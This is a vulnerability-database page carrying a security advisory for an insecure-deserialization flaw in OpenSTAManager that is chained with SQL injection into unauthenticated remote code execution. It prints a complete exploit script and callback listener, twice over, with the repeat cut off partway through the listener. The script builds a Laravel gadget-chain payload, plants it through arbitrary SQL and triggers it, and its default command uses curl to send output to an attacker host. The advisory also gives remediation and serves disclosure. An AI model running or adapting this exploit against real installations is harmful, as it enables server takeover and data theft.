Common Weakness Enumeration

CWE-502

Allowed

Deserialization of Untrusted Data

Abstraction: Base · Status: Draft

The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

4795 vulnerabilities reference this CWE, most recent first.

GHSA-WHV5-4Q2F-Q68G

Vulnerability from github – Published: 2026-04-01 19:46 – Updated: 2026-04-06 17:17
VLAI
Summary
OpenSTAManager Affected by Remote Code Execution via Insecure Deserialization in OAuth2
Details

Description

The oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction.

An attacker who can write to the zz_oauth2 table (e.g., via the arbitrary SQL injection in the Aggiornamenti module reported in GHSA-2fr7-cc4f-wh98) can insert a malicious serialized PHP object (gadget chain) that upon deserialization executes arbitrary commands on the server as the www-data user.

Affected code

Entry point — oauth2.php

$skip_permissions = true;                              // Line 23: NO AUTHENTICATION
include_once __DIR__.'/core.php';

$state = $_GET['state'];                               // Line 28: attacker-controlled
$code = $_GET['code'];

$account = OAuth2::where('state', '=', $state)->first(); // Line 33: fetches injected record
$response = $account->configure($code, $state);          // Line 51: triggers the chain

Deserialization — src/Models/OAuth2.php

// Line 193 (checkTokens):
$access_token = $this->access_token ? unserialize($this->access_token) : null;

// Line 151 (getAccessToken):
return $this->attributes['access_token'] ? unserialize($this->attributes['access_token']) : null;

unserialize() is called without the allowed_classes parameter, allowing instantiation of any class loaded by the Composer autoloader.

Execution flow

oauth2.php (no auth)
  → configure()
    → needsConfiguration()
      → getAccessToken()
        → checkTokens()
          → unserialize($this->access_token)   ← attacker payload
            → Creates PendingBroadcast object (Laravel/RCE22 gadget chain)
          → $access_token->hasExpired()         ← PendingBroadcast lacks this method → PHP Error
        → During error cleanup:
          → PendingBroadcast.__destruct()       ← fires during shutdown
            → system($command)                  ← RCE

The HTTP response is 500 (due to the hasExpired() error), but the command has already executed via __destruct() during error cleanup.

Full attack chain

This vulnerability is combined with the arbitrary SQL injection in the Aggiornamenti module (GHSA-2fr7-cc4f-wh98) to achieve unauthenticated RCE:

  1. Payload injection (requires admin account): Via op=risolvi-conflitti-database, arbitrary SQL is executed to insert a malicious serialized object into zz_oauth2.access_token
  2. RCE trigger (unauthenticated): A GET request to oauth2.php?state=<known_value>&code=x triggers the deserialization and executes the command

Persistence note: The risolvi-conflitti-database handler ends with exit; (line 128), which prevents the outer transaction commit. DML statements (INSERT) would be rolled back. To persist the INSERT, DDL statements (CREATE TABLE/DROP TABLE) are included to force an implicit MySQL commit.

Gadget chain

The chain used is Laravel/RCE22 (available in phpggc), which exploits classes from the Laravel framework present in the project's dependencies:

PendingBroadcast.__destruct()
  → $this->events->dispatch($this->event)
  → chain of __call() / __invoke()
  → system($command)

Proof of Concept

Execution

Terminal 1 — Attacker listener:

python3 listener.py --port 9999

Terminal 2 — Exploit:

python3 exploit.py \
  --target http://localhost:8888 \
  --callback http://host.docker.internal:9999 \
  --user admin --password <password>

image

Observed result

Listener receives: image The id command was executed on the server as www-data, confirming RCE.

HTTP requests from the exploit

Step 4 — Injection (authenticated):

POST /actions.php HTTP/1.1
Cookie: PHPSESSID=<session>
Content-Type: application/x-www-form-urlencoded

op=risolvi-conflitti-database&id_module=6&queries=["DELETE FROM zz_oauth2 WHERE state='poc-xxx'","INSERT INTO zz_oauth2 (id,name,class,client_id,client_secret,config,state,access_token,after_configuration,is_login,enabled) VALUES (99999,'poc','Modules\\\\Emails\\\\OAuth2\\\\Google','x','x','{}','poc-xxx',0x<payload_hex>,'',0,1)","CREATE TABLE IF NOT EXISTS _t(i INT)","DROP TABLE IF EXISTS _t"]

Step 5 — Trigger (NO authentication):

GET /oauth2.php?state=poc-xxx&code=x HTTP/1.1

(No cookies — completely anonymous request)

Response: HTTP 500 (expected — the error occurs after __destruct() has already executed the command)

Exploit — exploit.py

#!/usr/bin/env python3
"""
OpenSTAManager v2.10.1 — RCE PoC (Arbitrary SQL → Insecure Deserialization)

Usage:
  python3 listener.py --port 9999
  python3 exploit.py --target http://localhost:8888 --callback http://host.docker.internal:9999 --user admin --password Test1234
"""

import argparse
import json
import random
import re
import string
import subprocess
import sys
import time

try:
    import requests
except ImportError:
    print("[!] pip install requests")
    sys.exit(1)

RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
BOLD = "\033[1m"
DIM = "\033[2m"
RESET = "\033[0m"

BANNER = f"""
  {RED}{'=' * 58}{RESET}
  {RED}{BOLD}  OpenSTAManager v2.10.1 — RCE Proof of Concept{RESET}
  {RED}{BOLD}  Arbitrary SQL → Insecure Deserialization{RESET}
  {RED}{'=' * 58}{RESET}
"""


def log(msg, status="*"):
    icons = {"*": f"{BLUE}*{RESET}", "+": f"{GREEN}+{RESET}", "-": f"{RED}-{RESET}", "!": f"{YELLOW}!{RESET}"}
    print(f"  [{icons.get(status, '*')}] {msg}")


def step_header(num, title):
    print(f"\n  {BOLD}── Step {num}: {title} ──{RESET}\n")


def generate_payload(container, command):
    step_header(1, "Generate Gadget Chain Payload")

    log("Checking phpggc in container...")
    result = subprocess.run(["docker", "exec", container, "test", "-f", "/tmp/phpggc/phpggc"], capture_output=True)
    if result.returncode != 0:
        log("Installing phpggc...", "!")
        proc = subprocess.run(
            ["docker", "exec", container, "git", "clone", "https://github.com/ambionics/phpggc", "/tmp/phpggc"],
            capture_output=True, text=True,
        )
        if proc.returncode != 0:
            log(f"Failed to install phpggc: {proc.stderr}", "-")
            sys.exit(1)

    log(f"Command: {DIM}{command}{RESET}")

    result = subprocess.run(
        ["docker", "exec", container, "php", "/tmp/phpggc/phpggc", "Laravel/RCE22", "system", command],
        capture_output=True,
    )
    if result.returncode != 0:
        log(f"phpggc failed: {result.stderr.decode()}", "-")
        sys.exit(1)

    payload_bytes = result.stdout
    log(f"Payload: {BOLD}{len(payload_bytes)} bytes{RESET}", "+")
    return payload_bytes


def authenticate(target, username, password):
    step_header(2, "Authenticate")
    session = requests.Session()
    log(f"Logging in as '{username}'...")

    resp = session.post(
        f"{target}/index.php",
        data={"op": "login", "username": username, "password": password},
        allow_redirects=False, timeout=10,
    )

    location = resp.headers.get("Location", "")
    if resp.status_code != 302 or "index.php" in location:
        log("Login failed! Wrong credentials or brute-force lockout (3 attempts / 180s).", "-")
        sys.exit(1)

    session.get(f"{target}{location}", timeout=10)
    log("Authenticated", "+")
    return session


def find_module_id(session, target, container):
    step_header(3, "Find 'Aggiornamenti' Module ID")
    log("Searching navigation sidebar...")
    resp = session.get(f"{target}/controller.php", timeout=10)

    for match in re.finditer(r'id_module=(\d+)', resp.text):
        snippet = resp.text[match.start():match.start() + 300]
        if re.search(r'[Aa]ggiornamenti', snippet):
            module_id = int(match.group(1))
            log(f"Module ID: {BOLD}{module_id}{RESET}", "+")
            return module_id

    log("Not found in sidebar, querying database...", "!")
    result = subprocess.run(
        ["docker", "exec", container, "php", "-r",
         "require '/var/www/html/config.inc.php'; "
         "$pdo = new PDO('mysql:host='.$db_host.';dbname='.$db_name, $db_username, $db_password); "
         "echo $pdo->query(\"SELECT id FROM zz_modules WHERE name='Aggiornamenti'\")->fetchColumn();"],
        capture_output=True, text=True,
    )
    if result.stdout.strip().isdigit():
        module_id = int(result.stdout.strip())
        log(f"Module ID: {BOLD}{module_id}{RESET}", "+")
        return module_id

    log("Could not find module ID", "-")
    sys.exit(1)


def inject_payload(session, target, module_id, payload_bytes, state_value):
    step_header(4, "Inject Payload via Arbitrary SQL")

    hex_payload = payload_bytes.hex()
    record_id = random.randint(90000, 99999)

    queries = [
        f"DELETE FROM zz_oauth2 WHERE id={record_id} OR state='{state_value}'",
        f"INSERT INTO zz_oauth2 "
        f"(id, name, class, client_id, client_secret, config, "
        f"state, access_token, after_configuration, is_login, enabled) VALUES "
        f"({record_id}, 'poc', 'Modules\\\\Emails\\\\OAuth2\\\\Google', "
        f"'x', 'x', '{{}}', '{state_value}', 0x{hex_payload}, '', 0, 1)",
        "CREATE TABLE IF NOT EXISTS _poc_ddl_commit (i INT)",
        "DROP TABLE IF EXISTS _poc_ddl_commit",
    ]

    log(f"State trigger: {BOLD}{state_value}{RESET}")
    log(f"Payload: {len(hex_payload)//2} bytes ({len(hex_payload)} hex)")
    log("Sending to actions.php...")

    resp = session.post(
        f"{target}/actions.php",
        data={"op": "risolvi-conflitti-database", "id_module": str(module_id), "id_record": "", "queries": json.dumps(queries)},
        timeout=15,
    )

    try:
        result = json.loads(resp.text)
        if result.get("success"):
            log("Payload planted in zz_oauth2.access_token", "+")
            return True
        else:
            log(f"Injection failed: {result.get('message', '?')}", "-")
            return False
    except json.JSONDecodeError:
        log(f"Unexpected response (HTTP {resp.status_code}): {resp.text[:200]}", "-")
        return False


def trigger_rce(target, state_value):
    step_header(5, "Trigger RCE (NO AUTHENTICATION)")

    url = f"{target}/oauth2.php"
    log(f"GET {url}?state={state_value}&code=x")
    log(f"{DIM}(This request is UNAUTHENTICATED){RESET}")

    try:
        resp = requests.get(url, params={"state": state_value, "code": "x"}, allow_redirects=False, timeout=15)
        log(f"HTTP {resp.status_code}", "+")
        if resp.status_code == 500:
            log(f"{DIM}500 expected: __destruct() fires the gadget chain before error handling{RESET}")
    except requests.exceptions.Timeout:
        log("Timed out (command may still have executed)", "!")
    except requests.exceptions.ConnectionError as e:
        log(f"Connection error: {e}", "-")


def main():
    parser = argparse.ArgumentParser(description="OpenSTAManager v2.10.1 — RCE PoC")
    parser.add_argument("--target", required=True, help="Target URL")
    parser.add_argument("--callback", required=True, help="Attacker listener URL reachable from the container")
    parser.add_argument("--user", default="admin", help="Username (default: admin)")
    parser.add_argument("--password", required=True, help="Password")
    parser.add_argument("--container", default="osm-web", help="Docker web container (default: osm-web)")
    parser.add_argument("--command", help="Custom command (default: curl callback with id output)")
    args = parser.parse_args()

    print(BANNER)

    target = args.target.rstrip("/")
    callback = args.callback.rstrip("/")
    state_value = "poc-" + "".join(random.choices(string.ascii_lowercase + string.digits, k=12))
    command = args.command or f"curl -s {callback}/rce-$(id|base64 -w0)"

    payload = generate_payload(args.container, command)
    session = authenticate(target, args.user, args.password)
    module_id = find_module_id(session, target, args.container)

    if not inject_payload(session, target, module_id, payload, state_value):
        log("Exploit failed at injection step", "-")
        sys.exit(1)

    time.sleep(1)
    trigger_rce(target, state_value)

    print(f"\n  {BOLD}── Result ──{RESET}\n")
    log("Exploit complete. Check your listener for the callback.", "+")
    log("Expected: GET /rce-<base64(id)>")
    log(f"If no callback, verify the container can reach: {callback}", "!")


if __name__ == "__main__":
    main()

Listener — listener.py

#!/usr/bin/env python3
"""OpenSTAManager v2.10.1 — RCE Callback Listener"""

import argparse
import base64
import sys
from datetime import datetime
from http.server import HTTPServer, BaseHTTPRequestHandler

RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
BOLD = "\033[1m"
RESET = "\033[0m"


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        ts = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(f"\n  {RED}{'=' * 58}{RESET}")
        print(f"  {RED}{BOLD}  RCE CALLBACK RECEIVED{RESET}")
        print(f"  {RED}{'=' * 58}{RESET}")
        print(f"  {GREEN}[+]{RESET} Time : {ts}")
        print(f"  {GREEN}[+]{RESET} From : {self.client_address[0]}:{self.client_address[1]}")
        print(f"  {GREEN}[+]{RESET} Path : {self.path}")

        for part in self.path.lstrip("/").split("/"):
            if part.startswith("rce-"):
                try:
                    decoded = base64.b64decode(part[4:]).decode("utf-8", errors="replace")
                    print(f"  {GREEN}[+]{RESET} Output : {BOLD}{decoded}{RESET}")
                except Exception:
                    print(f"  {YELLOW}[!]{RESET} Raw : {part[4:]}")

        print(f"  {RED}{'=' * 58}{RESET}\n")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"OK")

    def do_POST(self):
        self.do_GET()

    def log_message(self, format, *args):
        pass


def main():
    parser = argparse.ArgumentParser(description="RCE callback listener")
    parser.add_argument("--port", type=int, default=9999, help="Listen port (default: 9999)")
    args = parser.parse_args()

    server = HTTPServer(("0.0.0.0", args.port), CallbackHandler)
    print(f"\n  {BLUE}{'=' * 58}{RESET}")
    print(f"  {BLUE}{BOLD}  OpenSTAManager v2.10.1 — RCE Callback Listener{RESET}")
    print(f"  {BLUE}{'=' * 58}{RESET}")
    print(f"  {GREEN}[+]{RESET} Listening on 0.0.0.0:{args.port}")
    print(f"  {YELLOW}[!]{RESET} Waiting for callback...\n")

    try:
        server.serve_forever()
    except KeyboardInterrupt:
        print(f"\n  {YELLOW}[!]{RESET} Stopped.")
        sys.exit(0)


if __name__ == "__main__":
    main()

Impact

  • Confidentiality: Read server files, database credentials, API keys
  • Integrity: Write files, install backdoors, modify application code
  • Availability: Delete files, denial of service
  • Scope: Command execution as www-data allows pivoting to other systems on the network

Proposed remediation

Option A: Restrict unserialize() (recommended)

// src/Models/OAuth2.php — checkTokens() and getAccessToken()
$access_token = $this->access_token
    ? unserialize($this->access_token, ['allowed_classes' => [AccessToken::class]])
    : null;

Option B: Use safe serialization

Replace serialize()/unserialize() with json_encode()/json_decode() for storing OAuth2 tokens.

Option C: Authenticate oauth2.php

Remove $skip_permissions = true and require authentication for the OAuth2 callback endpoint, or validate the state parameter against a value stored in the user's session.

Credits

Omar Ramirez

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.10.1"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "devcode-it/openstamanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.10.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T19:46:50Z",
    "nvd_published_at": "2026-04-02T14:16:27Z",
    "severity": "HIGH"
  },
  "details": "## Description\n\nThe `oauth2.php` file in OpenSTAManager is an **unauthenticated** endpoint (`$skip_permissions = true`). It loads a record from the `zz_oauth2` table using the attacker-controlled GET parameter `state`, and during the OAuth2 configuration flow calls `unserialize()` on the `access_token` field **without any class restriction**.\n\nAn attacker who can write to the `zz_oauth2` table (e.g., via the arbitrary SQL injection in the Aggiornamenti module reported in [GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) can insert a malicious serialized PHP object (gadget chain) that upon deserialization executes arbitrary commands on the server as the `www-data` user.\n\n## Affected code\n\n### Entry point \u2014 `oauth2.php`\n\n```php\n$skip_permissions = true;                              // Line 23: NO AUTHENTICATION\ninclude_once __DIR__.\u0027/core.php\u0027;\n\n$state = $_GET[\u0027state\u0027];                               // Line 28: attacker-controlled\n$code = $_GET[\u0027code\u0027];\n\n$account = OAuth2::where(\u0027state\u0027, \u0027=\u0027, $state)-\u003efirst(); // Line 33: fetches injected record\n$response = $account-\u003econfigure($code, $state);          // Line 51: triggers the chain\n```\n\n### Deserialization \u2014 `src/Models/OAuth2.php`\n\n```php\n// Line 193 (checkTokens):\n$access_token = $this-\u003eaccess_token ? unserialize($this-\u003eaccess_token) : null;\n\n// Line 151 (getAccessToken):\nreturn $this-\u003eattributes[\u0027access_token\u0027] ? unserialize($this-\u003eattributes[\u0027access_token\u0027]) : null;\n```\n\n`unserialize()` is called without the `allowed_classes` parameter, allowing instantiation of any class loaded by the Composer autoloader.\n\n## Execution flow\n\n```\noauth2.php (no auth)\n  \u2192 configure()\n    \u2192 needsConfiguration()\n      \u2192 getAccessToken()\n        \u2192 checkTokens()\n          \u2192 unserialize($this-\u003eaccess_token)   \u2190 attacker payload\n            \u2192 Creates PendingBroadcast object (Laravel/RCE22 gadget chain)\n          \u2192 $access_token-\u003ehasExpired()         \u2190 PendingBroadcast lacks this method \u2192 PHP Error\n        \u2192 During error cleanup:\n          \u2192 PendingBroadcast.__destruct()       \u2190 fires during shutdown\n            \u2192 system($command)                  \u2190 RCE\n```\n\nThe HTTP response is 500 (due to the `hasExpired()` error), but the command has already executed via `__destruct()` during error cleanup.\n\n## Full attack chain\n\nThis vulnerability is combined with the arbitrary SQL injection in the Aggiornamenti module ([GHSA-2fr7-cc4f-wh98](https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98)) to achieve unauthenticated RCE:\n\n1. **Payload injection** (requires admin account): Via `op=risolvi-conflitti-database`, arbitrary SQL is executed to insert a malicious serialized object into `zz_oauth2.access_token`\n2. **RCE trigger** (unauthenticated): A GET request to `oauth2.php?state=\u003cknown_value\u003e\u0026code=x` triggers the deserialization and executes the command\n\n**Persistence note**: The `risolvi-conflitti-database` handler ends with `exit;` (line 128), which prevents the outer transaction commit. DML statements (INSERT) would be rolled back. To persist the INSERT, DDL statements (`CREATE TABLE`/`DROP TABLE`) are included to force an implicit MySQL commit.\n\n## Gadget chain\n\nThe chain used is **Laravel/RCE22** (available in [phpggc](https://github.com/ambionics/phpggc)), which exploits classes from the Laravel framework present in the project\u0027s dependencies:\n\n```\nPendingBroadcast.__destruct()\n  \u2192 $this-\u003eevents-\u003edispatch($this-\u003eevent)\n  \u2192 chain of __call() / __invoke()\n  \u2192 system($command)\n```\n\n## Proof of Concept\n\n### Execution\n\n**Terminal 1** \u2014 Attacker listener:\n```bash\npython3 listener.py --port 9999\n```\n\n**Terminal 2** \u2014 Exploit:\n```bash\npython3 exploit.py \\\n  --target http://localhost:8888 \\\n  --callback http://host.docker.internal:9999 \\\n  --user admin --password \u003cpassword\u003e\n```\n\u003cimg width=\"638\" height=\"722\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e949b641-7986-44b9-acbf-1c5dd0f7ef1f\" /\u003e\n\n### Observed result\n\n**Listener receives:**\n\u003cimg width=\"683\" height=\"286\" alt=\"image\" src=\"https://github.com/user-attachments/assets/89a78f7e-5f23-435d-97ec-d74ac905cdc1\" /\u003e\nThe `id` command was executed on the server as `www-data`, confirming RCE.\n\n### HTTP requests from the exploit\n\n**Step 4 \u2014 Injection (authenticated):**\n```\nPOST /actions.php HTTP/1.1\nCookie: PHPSESSID=\u003csession\u003e\nContent-Type: application/x-www-form-urlencoded\n\nop=risolvi-conflitti-database\u0026id_module=6\u0026queries=[\"DELETE FROM zz_oauth2 WHERE state=\u0027poc-xxx\u0027\",\"INSERT INTO zz_oauth2 (id,name,class,client_id,client_secret,config,state,access_token,after_configuration,is_login,enabled) VALUES (99999,\u0027poc\u0027,\u0027Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google\u0027,\u0027x\u0027,\u0027x\u0027,\u0027{}\u0027,\u0027poc-xxx\u0027,0x\u003cpayload_hex\u003e,\u0027\u0027,0,1)\",\"CREATE TABLE IF NOT EXISTS _t(i INT)\",\"DROP TABLE IF EXISTS _t\"]\n```\n\n**Step 5 \u2014 Trigger (NO authentication):**\n```\nGET /oauth2.php?state=poc-xxx\u0026code=x HTTP/1.1\n\n(No cookies \u2014 completely anonymous request)\n```\n\n**Response:** HTTP 500 (expected \u2014 the error occurs after `__destruct()` has already executed the command)\n\n### Exploit \u2014 `exploit.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOpenSTAManager v2.10.1 \u2014 RCE PoC (Arbitrary SQL \u2192 Insecure Deserialization)\n\nUsage:\n  python3 listener.py --port 9999\n  python3 exploit.py --target http://localhost:8888 --callback http://host.docker.internal:9999 --user admin --password Test1234\n\"\"\"\n\nimport argparse\nimport json\nimport random\nimport re\nimport string\nimport subprocess\nimport sys\nimport time\n\ntry:\n    import requests\nexcept ImportError:\n    print(\"[!] pip install requests\")\n    sys.exit(1)\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\nRESET = \"\\033[0m\"\n\nBANNER = f\"\"\"\n  {RED}{\u0027=\u0027 * 58}{RESET}\n  {RED}{BOLD}  OpenSTAManager v2.10.1 \u2014 RCE Proof of Concept{RESET}\n  {RED}{BOLD}  Arbitrary SQL \u2192 Insecure Deserialization{RESET}\n  {RED}{\u0027=\u0027 * 58}{RESET}\n\"\"\"\n\n\ndef log(msg, status=\"*\"):\n    icons = {\"*\": f\"{BLUE}*{RESET}\", \"+\": f\"{GREEN}+{RESET}\", \"-\": f\"{RED}-{RESET}\", \"!\": f\"{YELLOW}!{RESET}\"}\n    print(f\"  [{icons.get(status, \u0027*\u0027)}] {msg}\")\n\n\ndef step_header(num, title):\n    print(f\"\\n  {BOLD}\u2500\u2500 Step {num}: {title} \u2500\u2500{RESET}\\n\")\n\n\ndef generate_payload(container, command):\n    step_header(1, \"Generate Gadget Chain Payload\")\n\n    log(\"Checking phpggc in container...\")\n    result = subprocess.run([\"docker\", \"exec\", container, \"test\", \"-f\", \"/tmp/phpggc/phpggc\"], capture_output=True)\n    if result.returncode != 0:\n        log(\"Installing phpggc...\", \"!\")\n        proc = subprocess.run(\n            [\"docker\", \"exec\", container, \"git\", \"clone\", \"https://github.com/ambionics/phpggc\", \"/tmp/phpggc\"],\n            capture_output=True, text=True,\n        )\n        if proc.returncode != 0:\n            log(f\"Failed to install phpggc: {proc.stderr}\", \"-\")\n            sys.exit(1)\n\n    log(f\"Command: {DIM}{command}{RESET}\")\n\n    result = subprocess.run(\n        [\"docker\", \"exec\", container, \"php\", \"/tmp/phpggc/phpggc\", \"Laravel/RCE22\", \"system\", command],\n        capture_output=True,\n    )\n    if result.returncode != 0:\n        log(f\"phpggc failed: {result.stderr.decode()}\", \"-\")\n        sys.exit(1)\n\n    payload_bytes = result.stdout\n    log(f\"Payload: {BOLD}{len(payload_bytes)} bytes{RESET}\", \"+\")\n    return payload_bytes\n\n\ndef authenticate(target, username, password):\n    step_header(2, \"Authenticate\")\n    session = requests.Session()\n    log(f\"Logging in as \u0027{username}\u0027...\")\n\n    resp = session.post(\n        f\"{target}/index.php\",\n        data={\"op\": \"login\", \"username\": username, \"password\": password},\n        allow_redirects=False, timeout=10,\n    )\n\n    location = resp.headers.get(\"Location\", \"\")\n    if resp.status_code != 302 or \"index.php\" in location:\n        log(\"Login failed! Wrong credentials or brute-force lockout (3 attempts / 180s).\", \"-\")\n        sys.exit(1)\n\n    session.get(f\"{target}{location}\", timeout=10)\n    log(\"Authenticated\", \"+\")\n    return session\n\n\ndef find_module_id(session, target, container):\n    step_header(3, \"Find \u0027Aggiornamenti\u0027 Module ID\")\n    log(\"Searching navigation sidebar...\")\n    resp = session.get(f\"{target}/controller.php\", timeout=10)\n\n    for match in re.finditer(r\u0027id_module=(\\d+)\u0027, resp.text):\n        snippet = resp.text[match.start():match.start() + 300]\n        if re.search(r\u0027[Aa]ggiornamenti\u0027, snippet):\n            module_id = int(match.group(1))\n            log(f\"Module ID: {BOLD}{module_id}{RESET}\", \"+\")\n            return module_id\n\n    log(\"Not found in sidebar, querying database...\", \"!\")\n    result = subprocess.run(\n        [\"docker\", \"exec\", container, \"php\", \"-r\",\n         \"require \u0027/var/www/html/config.inc.php\u0027; \"\n         \"$pdo = new PDO(\u0027mysql:host=\u0027.$db_host.\u0027;dbname=\u0027.$db_name, $db_username, $db_password); \"\n         \"echo $pdo-\u003equery(\\\"SELECT id FROM zz_modules WHERE name=\u0027Aggiornamenti\u0027\\\")-\u003efetchColumn();\"],\n        capture_output=True, text=True,\n    )\n    if result.stdout.strip().isdigit():\n        module_id = int(result.stdout.strip())\n        log(f\"Module ID: {BOLD}{module_id}{RESET}\", \"+\")\n        return module_id\n\n    log(\"Could not find module ID\", \"-\")\n    sys.exit(1)\n\n\ndef inject_payload(session, target, module_id, payload_bytes, state_value):\n    step_header(4, \"Inject Payload via Arbitrary SQL\")\n\n    hex_payload = payload_bytes.hex()\n    record_id = random.randint(90000, 99999)\n\n    queries = [\n        f\"DELETE FROM zz_oauth2 WHERE id={record_id} OR state=\u0027{state_value}\u0027\",\n        f\"INSERT INTO zz_oauth2 \"\n        f\"(id, name, class, client_id, client_secret, config, \"\n        f\"state, access_token, after_configuration, is_login, enabled) VALUES \"\n        f\"({record_id}, \u0027poc\u0027, \u0027Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google\u0027, \"\n        f\"\u0027x\u0027, \u0027x\u0027, \u0027{{}}\u0027, \u0027{state_value}\u0027, 0x{hex_payload}, \u0027\u0027, 0, 1)\",\n        \"CREATE TABLE IF NOT EXISTS _poc_ddl_commit (i INT)\",\n        \"DROP TABLE IF EXISTS _poc_ddl_commit\",\n    ]\n\n    log(f\"State trigger: {BOLD}{state_value}{RESET}\")\n    log(f\"Payload: {len(hex_payload)//2} bytes ({len(hex_payload)} hex)\")\n    log(\"Sending to actions.php...\")\n\n    resp = session.post(\n        f\"{target}/actions.php\",\n        data={\"op\": \"risolvi-conflitti-database\", \"id_module\": str(module_id), \"id_record\": \"\", \"queries\": json.dumps(queries)},\n        timeout=15,\n    )\n\n    try:\n        result = json.loads(resp.text)\n        if result.get(\"success\"):\n            log(\"Payload planted in zz_oauth2.access_token\", \"+\")\n            return True\n        else:\n            log(f\"Injection failed: {result.get(\u0027message\u0027, \u0027?\u0027)}\", \"-\")\n            return False\n    except json.JSONDecodeError:\n        log(f\"Unexpected response (HTTP {resp.status_code}): {resp.text[:200]}\", \"-\")\n        return False\n\n\ndef trigger_rce(target, state_value):\n    step_header(5, \"Trigger RCE (NO AUTHENTICATION)\")\n\n    url = f\"{target}/oauth2.php\"\n    log(f\"GET {url}?state={state_value}\u0026code=x\")\n    log(f\"{DIM}(This request is UNAUTHENTICATED){RESET}\")\n\n    try:\n        resp = requests.get(url, params={\"state\": state_value, \"code\": \"x\"}, allow_redirects=False, timeout=15)\n        log(f\"HTTP {resp.status_code}\", \"+\")\n        if resp.status_code == 500:\n            log(f\"{DIM}500 expected: __destruct() fires the gadget chain before error handling{RESET}\")\n    except requests.exceptions.Timeout:\n        log(\"Timed out (command may still have executed)\", \"!\")\n    except requests.exceptions.ConnectionError as e:\n        log(f\"Connection error: {e}\", \"-\")\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"OpenSTAManager v2.10.1 \u2014 RCE PoC\")\n    parser.add_argument(\"--target\", required=True, help=\"Target URL\")\n    parser.add_argument(\"--callback\", required=True, help=\"Attacker listener URL reachable from the container\")\n    parser.add_argument(\"--user\", default=\"admin\", help=\"Username (default: admin)\")\n    parser.add_argument(\"--password\", required=True, help=\"Password\")\n    parser.add_argument(\"--container\", default=\"osm-web\", help=\"Docker web container (default: osm-web)\")\n    parser.add_argument(\"--command\", help=\"Custom command (default: curl callback with id output)\")\n    args = parser.parse_args()\n\n    print(BANNER)\n\n    target = args.target.rstrip(\"/\")\n    callback = args.callback.rstrip(\"/\")\n    state_value = \"poc-\" + \"\".join(random.choices(string.ascii_lowercase + string.digits, k=12))\n    command = args.command or f\"curl -s {callback}/rce-$(id|base64 -w0)\"\n\n    payload = generate_payload(args.container, command)\n    session = authenticate(target, args.user, args.password)\n    module_id = find_module_id(session, target, args.container)\n\n    if not inject_payload(session, target, module_id, payload, state_value):\n        log(\"Exploit failed at injection step\", \"-\")\n        sys.exit(1)\n\n    time.sleep(1)\n    trigger_rce(target, state_value)\n\n    print(f\"\\n  {BOLD}\u2500\u2500 Result \u2500\u2500{RESET}\\n\")\n    log(\"Exploit complete. Check your listener for the callback.\", \"+\")\n    log(\"Expected: GET /rce-\u003cbase64(id)\u003e\")\n    log(f\"If no callback, verify the container can reach: {callback}\", \"!\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Listener \u2014 `listener.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"OpenSTAManager v2.10.1 \u2014 RCE Callback Listener\"\"\"\n\nimport argparse\nimport base64\nimport sys\nfrom datetime import datetime\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nRESET = \"\\033[0m\"\n\n\nclass CallbackHandler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        ts = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n        print(f\"\\n  {RED}{\u0027=\u0027 * 58}{RESET}\")\n        print(f\"  {RED}{BOLD}  RCE CALLBACK RECEIVED{RESET}\")\n        print(f\"  {RED}{\u0027=\u0027 * 58}{RESET}\")\n        print(f\"  {GREEN}[+]{RESET} Time : {ts}\")\n        print(f\"  {GREEN}[+]{RESET} From : {self.client_address[0]}:{self.client_address[1]}\")\n        print(f\"  {GREEN}[+]{RESET} Path : {self.path}\")\n\n        for part in self.path.lstrip(\"/\").split(\"/\"):\n            if part.startswith(\"rce-\"):\n                try:\n                    decoded = base64.b64decode(part[4:]).decode(\"utf-8\", errors=\"replace\")\n                    print(f\"  {GREEN}[+]{RESET} Output : {BOLD}{decoded}{RESET}\")\n                except Exception:\n                    print(f\"  {YELLOW}[!]{RESET} Raw : {part[4:]}\")\n\n        print(f\"  {RED}{\u0027=\u0027 * 58}{RESET}\\n\")\n        self.send_response(200)\n        self.send_header(\"Content-Type\", \"text/plain\")\n        self.end_headers()\n        self.wfile.write(b\"OK\")\n\n    def do_POST(self):\n        self.do_GET()\n\n    def log_message(self, format, *args):\n        pass\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"RCE callback listener\")\n    parser.add_argument(\"--port\", type=int, default=9999, help=\"Listen port (default: 9999)\")\n    args = parser.parse_args()\n\n    server = 